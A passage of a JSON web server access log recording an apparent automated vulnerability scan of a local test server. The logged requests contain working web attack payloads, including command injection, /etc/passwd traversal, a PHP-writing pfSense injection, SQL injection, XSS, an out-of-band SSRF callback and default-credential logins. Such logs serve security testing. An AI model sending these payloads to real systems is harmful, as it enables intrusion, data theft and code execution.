HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /eam/vib?id=/etc/issue HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.172","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /interface/login/login.php?site=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /radiusmanager/user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22prom-operator\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.178","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /development.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asp/Main.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/common/clearcache?previousUrl=http://www.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/babel/redirect.php?newurl=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://c9v8h8gsmpv8c1qg07h0nxyssq397p99c.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemstatus.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.199","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graphql?query=+{customerDownloadableProducts+{+items+{+date+download_url}}+} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cluster/cluster HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xprober.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /view/viewer_index.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/super-forms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.209","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openvpn-monitor/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapp/?fccc%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pics/logo_70x29px.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /systemController/showOrDownByurl.do?down=&dbPath=../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"getpwd=WorldFilledWithLove","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"fldr=&url=file:///etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /filemanager/upload.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:14 